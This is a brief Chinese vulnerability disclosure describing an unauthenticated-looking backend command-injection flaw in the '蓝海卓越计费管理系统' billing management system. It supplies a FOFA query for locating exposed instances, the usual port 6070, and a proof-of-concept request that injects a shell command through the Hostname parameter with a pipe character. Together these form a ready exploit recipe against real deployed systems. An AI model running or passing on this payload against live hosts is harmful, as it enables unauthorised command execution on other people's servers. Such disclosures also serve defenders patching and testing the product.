蓝海卓越计费管理系统后台RCE

漏洞描述

蓝海卓越计费管理系统后台存在RCE，可进行命令执行

漏洞影响

蓝海卓越计费管理系统

FOFA

app="蓝海卓越计费管理系统"

漏洞复现

漏洞存在点很简单，就是没有对输入的过滤

执行拼接代码执行，这里有个点需要注意以下，就是接口不能存在，才能进行拼接，当接口不存在的时候，接口调用为空，则后面可以进行拼接

无任何其他的过滤操作

poc

端口一般开在6070

Hostname=114.114.114.114|ls -la&physicalInterface=1&pingCount=1